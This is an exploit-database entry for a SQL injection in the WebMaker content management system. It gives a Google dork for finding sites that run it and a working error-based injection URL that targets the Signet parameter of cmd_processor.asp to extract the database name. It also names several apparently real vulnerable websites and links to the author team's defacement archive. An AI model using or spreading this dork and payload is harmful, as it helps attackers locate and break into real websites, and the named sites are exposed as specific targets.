WebMaker SQL Injection Vulnerability

2013-01-14T00:00:00
ID 1337DAY-ID-20178
Type zdt
Reporter Mormoroth
Modified 2013-01-14T00:00:00

Description

http://www.novicar.ch/ http://www.rwbholding.ch/ http://www.webexpert.ch

                                        
                                            # Exploit Title: WebMaker SQL Injection
# Google Dork: intext:"Powered by WebMaker"
# Date: 13.1.2013
# Exploit Author: Mormoroth
# Vendor Homepage: http://www.webexpert.ch
# Tested on: Windows
# Affected Version : All versions
---------------------------------

Webmaker is also vulnerable to Blind SQL Injection in same path

------------SQL INJECTION--------

http://site.com/navigation/cmd_processor.asp?Class=navigation&Id=148&Language=IT&OrgID=5&Signet=' or 1=convert(int,db_name())--

---------------------------------

ISCN TEAM

http://blog.mormoroth.ir
http://ha.cker.ir
Follow me on Twitter And Facebook
http://twitter.com/Mormoroth
http://facebook.com/ISCNTEAM

ISCN Special Defacements Archive
http://www.zone-h.org/archive/special=1/notifier=ISCN

Special Thanks to Yashar Shahinzadeh
http://Y-shahinzadeh.ir
http://Twitter.com/YShahinzadeh
From Iran

#  0day.today [2018-01-01]  #